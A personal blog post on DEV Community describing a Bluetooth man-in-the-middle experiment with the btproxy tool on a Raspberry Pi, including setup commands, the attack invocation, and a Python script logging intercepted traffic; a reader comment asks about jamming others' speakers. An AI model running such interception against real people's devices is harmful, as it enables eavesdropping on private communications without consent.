DEV Community

Paula
Paula

Posted on

Security Sprint Week 10 & 11: Bluetooth hacking

I've been quite in many things lately, which didn't allow me to study all I wanted to. I'm mainly in two things, distributed ledger experiments and hardware. But I've had in mind a hacking experiment for quite a long time, and finally I decided to try it. It's a Man In The Middle attack (or sniffing) over bluetooth connections using a python repository, I think I will omit for what I wanted to know that.

Anyway, what I want to do here is to catch a connection between two nodes using bluetooth. The first idea is only to capture the content of the connection. For this I need a linux system, in this case I'm using debian based Raspbian in the RPi 3.

On it, I install some packages and clone the repo of the tool on github (git needed here, btw):

$ sudo apt-get install bluez libbluetooth-dev python-dev
$ git clone git://github.com/conorpp/btproxy

Enter fullscreen mode Exit fullscreen mode

For installing the tool, simply use sudo python setup.py install.

Now we need to get the MAC address of the both nodes.

$ hcitool scan 
Enter fullscreen mode Exit fullscreen mode

Once we have them, we can use them in the most basic MITM attack the tool offer, like this:

$ sudo btproxy <master-bt-mac-address> <slave-bt-mac-address>
Enter fullscreen mode Exit fullscreen mode

The master is the device the sends the connection request and the slave is the device listening for something to connect to it. We can make it better passing a custom script for slave and master, as explained in the README. for this we use btproxy -s SCRIPT being the script something like this:

# script_example.py
def master_cb(req):
    """
        Received something from master, about to be sent to slave.
    """
    print '<< ', repr(req)
    open('mastermessages.log', 'a+b').write(req)
    return req

def slave_cb(res):
    """
        Same as above but it's from slave about to be sent to master
    """
    print '>> ', repr(res)
    open('slavemessages.log', 'a+b').write(res)
    return res
Enter fullscreen mode Exit fullscreen mode

I must say this tool confusing when using two nodes being equal, such as two mobiles phones, and didn't work properly. Also for that kind of sniffing I would suggest this repo instead, which also prepares a .pcap file out of the scanning for the phone traffic, but it might needs hardware support, if you have an arduino you can make your own, tho. On the other hand, another alternative is BTJuice, which also works with python + NodeJS. This tool is very complete and includes an user-friendly interface for using in localhost. Also the commands are very similar to the ones used in btproxy.

Anyway this is everything I got until now!

Top comments (1)

Collapse
 
jadolg profile image
Jorge Alberto Díaz Orozco (Akiel)

Nice post :) I'm actually interested in jamming/interrupting bluetooth connections to disconnect annoying bluetooth speakers. Any ideas?